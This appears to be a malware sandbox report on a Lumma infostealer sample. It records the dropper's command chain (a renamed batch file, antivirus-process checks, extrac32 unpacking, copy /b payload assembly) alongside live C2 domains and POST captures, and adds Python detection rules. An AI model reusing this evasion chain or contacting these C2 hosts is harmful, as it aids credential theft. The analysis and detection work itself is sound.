Analysis

  • max time kernel
    121s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
  • submitted
    17/01/2025, 14:28 UTC

General

  • Target

    Setup.exe

  • Size

    1.1MB

  • MD5

    d630944d759e73848965cf7dbd9c89e3

  • SHA1

    4f91c583c9961c9c891d2fb63d3a709b41fe97f0

  • SHA256

    bceb986397dc19b258f4be0fd2559d67b10875430b31296e263e05ee3b9a0247

  • SHA512

    63b9f74815d869d6ca86989e5be9d4ac4aad88773c217d33465de2b756453f03c000bd200b3691e4e3fdf4cbd3cea55cd96ad626a347ff451a71e44d650a99c5

  • SSDEEP

    24576:jjBtLjvnr3blqsEQHKD+fFJy9jAeEaNPqUEE1FCrhiO1x53w3:vPv3bHfzyJAw7ERF3w3

Score
10/10

Malware Config

Extracted

Family

lumma

C2

https://twigbestug.shop/api

Signatures

  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • Executes dropped EXE (1 IoC)
  • Loads dropped DLL (1 IoC)
  • Enumerates processes with tasklist (1 TTP, 2 IoCs)
  • Drops file in Windows directory (5 IoCs)
  • Enumerates physical storage devices (1 TTP)

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery (1 TTP, 13 IoCs)

    Attempts to gather information about the system language of the victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses (3 IoCs)
  • Suspicious use of AdjustPrivilegeToken (2 IoCs)
  • Suspicious use of FindShellTrayWindow (3 IoCs)
  • Suspicious use of SendNotifyMessage (3 IoCs)
  • Suspicious use of WriteProcessMemory (48 IoCs)

Processes

  • C:\Users\Admin\AppData\Local\Temp\Setup.exe
    "C:\Users\Admin\AppData\Local\Temp\Setup.exe"
    1⤵
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2412
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c move Aurora Aurora.cmd & Aurora.cmd
      2⤵
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2428
      • C:\Windows\SysWOW64\tasklist.exe
        tasklist
        3⤵
        • Enumerates processes with tasklist
        • System Location Discovery: System Language Discovery
        • Suspicious use of AdjustPrivilegeToken
        PID:2308
      • C:\Windows\SysWOW64\findstr.exe
        findstr /I "opssvc wrsa"
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2296
      • C:\Windows\SysWOW64\tasklist.exe
        tasklist
        3⤵
        • Enumerates processes with tasklist
        • System Location Discovery: System Language Discovery
        • Suspicious use of AdjustPrivilegeToken
        PID:2248
      • C:\Windows\SysWOW64\findstr.exe
        findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
        3⤵
        • System Location Discovery: System Language Discovery
        PID:3060
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c md 740515
        3⤵
        • System Location Discovery: System Language Discovery
        PID:284
      • C:\Windows\SysWOW64\extrac32.exe
        extrac32 /Y /E Barbara
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2456
      • C:\Windows\SysWOW64\findstr.exe
        findstr /V "learned" Valley
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2648
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c copy /b 740515\Faq.com + Landing + Viral + Grenada + Jake + Master + Booty + Responding + Supports + Listing 740515\Faq.com
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2764
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c copy /b ..\Ages + ..\Folder + ..\Postposted + ..\Involves + ..\Styles + ..\Safe + ..\Completion b
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2656
      • C:\Users\Admin\AppData\Local\Temp\740515\Faq.com
        Faq.com b
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        PID:2236
      • C:\Windows\SysWOW64\choice.exe
        choice /d y /t 5
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2544
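
The tree above is the whole dropper, and every step of it is a built-in Windows tool: cmd.exe renames the dropped file Aurora to Aurora.cmd and runs it in the same command line; the script greps tasklist output twice for security products (opssvc and wrsa, then AvastUI, AVGUI, bdservicehost, nsWscSvc, ekrn and SophosHealth); it unpacks Barbara with extrac32; it reassembles two files from innocuously named chunks with copy /b (Faq.com from Landing through Listing, appended onto itself, and b from Ages through Completion); it runs Faq.com with b as its argument; and it pads the run with choice /t 5. The Python below is an added example, not code from the sandbox report or from the malware: a set of detection rules evaluated over the command lines transcribed from the tree. The rule names, the PPID values (the report shows parent/child by indentation only, and Setup.exe's own parent is not shown) and the chunk-count threshold are the author's assumptions.

```python
"""Host-side detection rules for the batch dropper chain in the Processes
section above. Added example, not code from the sandbox or the malware; the
rule names and the PPID values are the author's own (the report shows the
tree by indentation only, and Setup.exe's parent is not shown, so it gets 0)."""
import re
from collections import defaultdict, namedtuple

Proc = namedtuple("Proc", "pid ppid image cmdline")

# Security-product process names the dropper grepped for (from the report).
SECURITY_PROCESS_NAMES = {"opssvc", "wrsa", "avastui", "avgui",
                          "bdservicehost", "nswscsvc", "ekrn", "sophoshealth"}

# Transcribed from the Processes section: PID, PPID, image, command line.
REPORT_PROCESSES = [
    Proc(2412, 0, r"C:\Users\Admin\AppData\Local\Temp\Setup.exe",
         r'"C:\Users\Admin\AppData\Local\Temp\Setup.exe"'),
    Proc(2428, 2412, r"C:\Windows\SysWOW64\cmd.exe",
         r'"C:\Windows\System32\cmd.exe" /c move Aurora Aurora.cmd & Aurora.cmd'),
    Proc(2308, 2428, r"C:\Windows\SysWOW64\tasklist.exe", "tasklist"),
    Proc(2296, 2428, r"C:\Windows\SysWOW64\findstr.exe", 'findstr /I "opssvc wrsa"'),
    Proc(2248, 2428, r"C:\Windows\SysWOW64\tasklist.exe", "tasklist"),
    Proc(3060, 2428, r"C:\Windows\SysWOW64\findstr.exe",
         'findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"'),
    Proc(284, 2428, r"C:\Windows\SysWOW64\cmd.exe", "cmd /c md 740515"),
    Proc(2456, 2428, r"C:\Windows\SysWOW64\extrac32.exe", "extrac32 /Y /E Barbara"),
    Proc(2648, 2428, r"C:\Windows\SysWOW64\findstr.exe", 'findstr /V "learned" Valley'),
    Proc(2764, 2428, r"C:\Windows\SysWOW64\cmd.exe",
         r"cmd /c copy /b 740515\Faq.com + Landing + Viral + Grenada + Jake + Master"
         r" + Booty + Responding + Supports + Listing 740515\Faq.com"),
    Proc(2656, 2428, r"C:\Windows\SysWOW64\cmd.exe",
         r"cmd /c copy /b ..\Ages + ..\Folder + ..\Postposted + ..\Involves"
         r" + ..\Styles + ..\Safe + ..\Completion b"),
    Proc(2236, 2428, r"C:\Users\Admin\AppData\Local\Temp\740515\Faq.com", "Faq.com b"),
    Proc(2544, 2428, r"C:\Windows\SysWOW64\choice.exe", "choice /d y /t 5"),
]


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def parse_copy_b(cmdline):
    """Parse `copy /b A + B [+ ...] [dest]` into (input parts, destination).
    Without a destination, copy appends the rest to A in place; the dropper
    gets the same effect by naming its first input as the destination."""
    m = re.search(r"\bcopy\s+/b\s+(.+)$", cmdline, flags=re.I)
    if not m:
        return None
    tokens = m.group(1).split()
    if len(tokens) < 3 or "+" not in tokens:
        return None
    if tokens[-2] == "+":                 # `copy /b A + B`: no destination
        operands, dest = tokens, None
    else:
        operands, dest = tokens[:-1], tokens[-1]
    parts = [t for t in operands if t != "+"]
    return parts, (dest if dest is not None else parts[0])


def evaluate(procs):
    """Run every rule over the process list; returns rule name -> sorted PIDs."""
    hits = defaultdict(set)
    children = defaultdict(list)
    for p in procs:
        children[p.ppid].append(p)
    assembled = set()                     # basenames produced by copy /b
    for p in procs:
        img, cl = basename(p.image), p.cmdline
        # 1. "move X X.cmd & X.cmd": give a dropped file a batch extension
        #    and run it in the same command line.
        if img == "cmd.exe" and re.search(
                r"\bmove\s+(\S+)\s+\1\.(cmd|bat)\b.*&\s*\1\.\2\b", cl, re.I):
            hits["rename_and_run"].add(p.pid)
        # 2. findstr for security-product names with a tasklist sibling under
        #    the same cmd.exe (`tasklist | findstr` is logged as two children).
        if img == "findstr.exe" and any(
                basename(s.image) == "tasklist.exe" for s in children[p.ppid]):
            words = {w.lower() for q in re.findall(r'"([^"]*)"', cl) for w in q.split()}
            if words & SECURITY_PROCESS_NAMES:
                hits["security_product_discovery"].add(p.pid)
        # 3. Binary concatenation of several dropped chunks into one file.
        parsed = parse_copy_b(cl) if img == "cmd.exe" else None
        if parsed and len(parsed[0]) >= 3:
            hits["chunk_concatenation"].add(p.pid)
            assembled.add(basename(parsed[1]))
        # 4. extrac32, a signed CAB extractor, unpacking a renamed archive.
        if img == "extrac32.exe" and re.search(r"/E\b", cl, re.I):
            hits["cab_extraction"].add(p.pid)
        # 5. choice /t N used as a sleep to outlast short analysis windows.
        if img == "choice.exe" and re.search(r"/t\s+\d+", cl, re.I):
            hits["choice_sleep"].add(p.pid)
    # 6. A file the chain assembled is executed, or passed as an argument to
    #    something that is (Faq.com b).
    for p in procs:
        names = {basename(t) for t in p.cmdline.split()} | {basename(p.image)}
        if basename(p.image) != "cmd.exe" and names & assembled:
            hits["executes_assembled_file"].add(p.pid)
    return {rule: sorted(pids) for rule, pids in hits.items()}
```

Any one of these rules fires on benign administration now and then; what makes the chain worth an alert is all six under a single cmd.exe parent within a few seconds, so correlate on `children[ppid]` rather than alerting per rule. Rule 6 is the one that survives a rename of the chunks: whatever copy /b produced is what runs next.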

Network

  • Geo: US
    DNS
    YkrFgzgkdfBNvBRQ.YkrFgzgkdfBNvBRQ
    Faq.com
    Remote address:
    8.8.8.8:53
    Request
    YkrFgzgkdfBNvBRQ.YkrFgzgkdfBNvBRQ
    IN A
    Response
  • Geo: US
    DNS
    twigbestug.shop
    Faq.com
    Remote address:
    8.8.8.8:53
    Request
    twigbestug.shop
    IN A
    Response
    twigbestug.shop
    IN A
    104.21.36.233
    twigbestug.shop
    IN A
    172.67.200.205
  • Geo: US
    POST
    https://twigbestug.shop/api
    Faq.com
    Remote address:
    104.21.36.233:443
    Request
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: twigbestug.shop
    Response
    HTTP/1.1 200 OK
    Date: Fri, 17 Jan 2025 14:29:45 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Set-Cookie: PHPSESSID=rkmbro0b6qesfc9k4j0a4ohsav; expires=Tue, 13 May 2025 08:16:24 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    X-Frame-Options: DENY
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 1; mode=block
    cf-cache-status: DYNAMIC
    vary: accept-encoding
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XnNrXJ1rFBUyEiCYotTSubR2bzcmvBhvqS130IBYEKvCowNe5mfM0u5C%2FymDqJp2Fa19ZD7Xx6ckyfuUremLLqba1%2BL%2F%2Fj%2B4lKx%2BY7u%2F3wl%2BWGzU3kzDmAHkeTlBU8JGeWQ%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 90370a104a9b887f-LHR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=36298&min_rtt=26410&rtt_var=25050&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2856&recv_bytes=583&delivery_rate=130803&cwnd=253&unsent_bytes=0&cid=ed873a69645a6a9d&ts=335&x=0"
  • Geo: US
    DNS
    strivehelpeu.bond
    Faq.com
    Remote address:
    8.8.8.8:53
    Request
    strivehelpeu.bond
    IN A
    Response
    strivehelpeu.bond
    IN A
    104.21.49.103
    strivehelpeu.bond
    IN A
    172.67.161.160
  • Geo: US
    POST
    https://strivehelpeu.bond/api
    Faq.com
    Remote address:
    104.21.49.103:443
    Request
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: strivehelpeu.bond
    Response
    HTTP/1.1 200 OK
    Date: Fri, 17 Jan 2025 14:29:46 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Set-Cookie: PHPSESSID=ccvb86265e5vaduho0de8kbog6; expires=Tue, 13 May 2025 08:16:25 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    X-Frame-Options: DENY
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 1; mode=block
    cf-cache-status: DYNAMIC
    vary: accept-encoding
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WU%2B0%2BUwKV%2FIl4inqvqGpSMZuYUNb4VF9l6YvtQQ3ibdn2dgwkvFNrT4dSfnHVgMlpvMsM8lelH8p8lBfdQvQup7rcs9Pn55xwrMHtdecLHjKSpK74Wuq6fE%2Fk6Atfbf%2BTvzndA%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 90370a1278a6ef58-LHR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=27246&min_rtt=26063&rtt_var=7345&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2860&recv_bytes=585&delivery_rate=136487&cwnd=253&unsent_bytes=0&cid=526a19886cc0cf55&ts=525&x=0"
  • Geo: US
    DNS
    crookedfoshe.bond
    Faq.com
    Remote address:
    8.8.8.8:53
    Request
    crookedfoshe.bond
    IN A
    Response
    crookedfoshe.bond
    IN A
    104.21.16.1
    crookedfoshe.bond
    IN A
    104.21.80.1
    crookedfoshe.bond
    IN A
    104.21.64.1
    crookedfoshe.bond
    IN A
    104.21.48.1
    crookedfoshe.bond
    IN A
    104.21.96.1
    crookedfoshe.bond
    IN A
    104.21.112.1
    crookedfoshe.bond
    IN A
    104.21.32.1
  • Geo: US
    POST
    https://crookedfoshe.bond/api
    Faq.com
    Remote address:
    104.21.16.1:443
    Request
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: crookedfoshe.bond
    Response
    HTTP/1.1 200 OK
    Date: Fri, 17 Jan 2025 14:29:46 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Set-Cookie: PHPSESSID=vlhsupcmtq8up0bb3gbdfi5qpa; expires=Tue, 13 May 2025 08:16:25 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    X-Frame-Options: DENY
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 1; mode=block
    cf-cache-status: DYNAMIC
    vary: accept-encoding
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mwHL0Ha3ZqYMTSh8Rm3AbuyPbQDBBG7nGlAX%2FCQCWASK6%2BwD%2FkUs9flJiQwTgTGbbkxrLhKo9Yq0MsbU7YXDrSBRlAh5ejkp19oj0Fr8byCNC%2FYnr4H3h1FeQthd6O7Vd2YL7g%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 90370a165f48ecff-LHR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=27155&min_rtt=26075&rtt_var=7367&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2861&recv_bytes=585&delivery_rate=133113&cwnd=253&unsent_bytes=0&cid=3d413894ae8fc164&ts=254&x=0"
  • Geo: US
    DNS
    immolatechallen.bond
    Faq.com
    Remote address:
    8.8.8.8:53
    Request
    immolatechallen.bond
    IN A
    Response
    immolatechallen.bond
    IN A
    172.67.185.74
    immolatechallen.bond
    IN A
    104.21.32.87
  • Geo: US
    POST
    https://immolatechallen.bond/api
    Faq.com
    Remote address:
    172.67.185.74:443
    Request
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: immolatechallen.bond
    Response
    HTTP/1.1 200 OK
    Date: Fri, 17 Jan 2025 14:29:47 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Set-Cookie: PHPSESSID=439cisece6dhntb4g5b81nr93e; expires=Tue, 13 May 2025 08:16:26 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    X-Frame-Options: DENY
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 1; mode=block
    cf-cache-status: DYNAMIC
    vary: accept-encoding
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8yOYU%2BlsFE%2B5ZiUg0O5u1aPndS0nNmjT%2BpPG9JJO5mGUCwtP503yX6t5wEJ8NnkXTCBhJSV5WeYF1XhhR4au%2BGGUCbNEsqsewUTm8idAyvBPr0EYYGRX934SEv6lozEKSA4U0Pz3kA%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 90370a189e3c94ab-LHR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=27450&min_rtt=26360&rtt_var=7394&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2871&recv_bytes=588&delivery_rate=132995&cwnd=236&unsent_bytes=0&cid=0d01242d532a33b8&ts=263&x=0"
  • Geo: US
    DNS
    stripedre-lot.bond
    Faq.com
    Remote address:
    8.8.8.8:53
    Request
    stripedre-lot.bond
    IN A
    Response
    stripedre-lot.bond
    IN A
    104.21.55.3
    stripedre-lot.bond
    IN A
    172.67.143.194
  • Geo: US
    POST
    https://stripedre-lot.bond/api
    Faq.com
    Remote address:
    104.21.55.3:443
    Request
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: stripedre-lot.bond
    Response
    HTTP/1.1 200 OK
    Date: Fri, 17 Jan 2025 14:29:47 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Set-Cookie: PHPSESSID=o9qbgtfht4r31uu5i50n8t7l8c; expires=Tue, 13 May 2025 08:16:26 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    X-Frame-Options: DENY
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 1; mode=block
    cf-cache-status: DYNAMIC
    vary: accept-encoding
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OE18f9Y2DdV44yZ26jWqPTnIVE0btfvRtEMKByOLDH7e9k4lFCdVj9v5q6LsCwzUOpajzhylPHAUUKGFWBpMgYB21yS91DhiNxk8U4O5mOPXwTC4D8nm26iIvR9Dwe51TXD7yh0%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 90370a1ac8fbcd7e-LHR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=27497&min_rtt=26410&rtt_var=7336&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2865&recv_bytes=586&delivery_rate=132974&cwnd=253&unsent_bytes=0&cid=363b1c4294cd79ea&ts=281&x=0"
  • Geo: US
    DNS
    growthselec.bond
    Faq.com
    Remote address:
    8.8.8.8:53
    Request
    growthselec.bond
    IN A
    Response
    growthselec.bond
    IN A
    104.21.96.1
    growthselec.bond
    IN A
    104.21.16.1
    growthselec.bond
    IN A
    104.21.48.1
    growthselec.bond
    IN A
    104.21.32.1
    growthselec.bond
    IN A
    104.21.80.1
    growthselec.bond
    IN A
    104.21.64.1
    growthselec.bond
    IN A
    104.21.112.1
  • Geo: US
    POST
    https://growthselec.bond/api
    Faq.com
    Remote address:
    104.21.96.1:443
    Request
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: growthselec.bond
    Response
    HTTP/1.1 200 OK
    Date: Fri, 17 Jan 2025 14:29:47 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Set-Cookie: PHPSESSID=sro9ahtq5o6m5jen3j6aaivl08; expires=Tue, 13 May 2025 08:16:26 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    X-Frame-Options: DENY
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 1; mode=block
    cf-cache-status: DYNAMIC
    vary: accept-encoding
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2ZznTtS5Y9YCVjsep%2FsrpYAV9t7buLIhPoD7FaYFpSiBazC%2FLXnllbQ6P%2BTQvc4V809ZmuJWpo6scRjzfOFmlGeNNcTiNKJhdYFDTQiAsb4iSAfosA6VH0mwryXwZL9HeWM2"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 90370a1d3a836364-LHR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=27697&min_rtt=26455&rtt_var=7438&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2857&recv_bytes=584&delivery_rate=133760&cwnd=253&unsent_bytes=0&cid=450b7dd4b67735d5&ts=268&x=0"
  • Geo: US
    DNS
    jarry-deatile.bond
    Faq.com
    Remote address:
    8.8.8.8:53
    Request
    jarry-deatile.bond
    IN A
    Response
    jarry-deatile.bond
    IN A
    172.67.151.242
    jarry-deatile.bond
    IN A
    104.21.40.131
  • Geo: US
    POST
    https://jarry-deatile.bond/api
    Faq.com
    Remote address:
    172.67.151.242:443
    Request
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: jarry-deatile.bond
    Response
    HTTP/1.1 200 OK
    Date: Fri, 17 Jan 2025 14:30:07 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Set-Cookie: PHPSESSID=8v05dg8vi0e488u5kqu7uep8fg; expires=Tue, 13 May 2025 08:16:46 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    X-Frame-Options: DENY
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 1; mode=block
    cf-cache-status: DYNAMIC
    vary: accept-encoding
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AXt6VMlzsWAztwXiJe7BDHEMXx121eWvQlx3chP%2B08rg94r494uTFRkiZSqd3OtUpArOXhYHg3rSqXbGXrUFCtU9GcKh4onsP4ufMJMF3%2BpNN9jsWLzqRuE5CC8liJkpik3AiEc%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 90370a1f7ea3777f-LHR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=27374&min_rtt=26355&rtt_var=7315&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2866&recv_bytes=586&delivery_rate=134241&cwnd=253&unsent_bytes=0&cid=b8b85f41bb65b2c0&ts=19951&x=0"
  • Geo: US
    DNS
    pain-temper.bond
    Faq.com
    Remote address:
    8.8.8.8:53
    Request
    pain-temper.bond
    IN A
    Response
    pain-temper.bond
    IN A
    172.67.140.28
    pain-temper.bond
    IN A
    104.21.73.40
  • Geo: US
    POST
    https://pain-temper.bond/api
    Faq.com
    Remote address:
    172.67.140.28:443
    Request
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: pain-temper.bond
    Response
    HTTP/1.1 200 OK
    Date: Fri, 17 Jan 2025 14:30:08 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Set-Cookie: PHPSESSID=hhg3u8nljfpf997bfjagivj0df; expires=Tue, 13 May 2025 08:16:47 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    X-Frame-Options: DENY
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 1; mode=block
    cf-cache-status: DYNAMIC
    vary: accept-encoding
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hYnDkvTwo01%2BW62LWA%2BgdHxq6dTu1ISi2nIka%2BO%2F9hCSP%2FyVFPsfcg4rVKrIwIhdAboB8njnBerhOpr8JP1sFPhGpBDB%2FVShOckNrBtuyqCLG0iV7nJgE9nxNG%2Biqf4fMkLg"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 90370a9cabc093ed-LHR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=27761&min_rtt=26556&rtt_var=7747&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2857&recv_bytes=584&delivery_rate=132895&cwnd=253&unsent_bytes=0&cid=3b191eb120b21022&ts=290&x=0"
  • Geo: US
    DNS
    jarry-fixxer.bond
    Faq.com
    Remote address:
    8.8.8.8:53
    Request
    jarry-fixxer.bond
    IN A
    Response
    jarry-fixxer.bond
    IN A
    104.21.78.5
    jarry-fixxer.bond
    IN A
    172.67.214.67
  • Geo: US
    POST
    https://jarry-fixxer.bond/api
    Faq.com
    Remote address:
    104.21.78.5:443
    Request
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: jarry-fixxer.bond
    Response
    HTTP/1.1 200 OK
    Date: Fri, 17 Jan 2025 14:30:08 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Set-Cookie: PHPSESSID=10rokp9c4akuo15rsogjroapra; expires=Tue, 13 May 2025 08:16:47 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    X-Frame-Options: DENY
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 1; mode=block
    cf-cache-status: DYNAMIC
    vary: accept-encoding
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CI9%2F5%2B1HncbCEkGbERe4%2FfPF6cl%2BlRXlMCTOECosSg382CzLQjih0g9aYjExbLbbtFPp7eWe8NbVZ3rPfTsPy5AdJ0mhwVX%2BLV4JuapbeKYXw6j%2BAkJECWao5D0tpNWJoGefyA%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 90370a9f0c344916-LHR
    alt-svc: h3=":443"; ma=86400
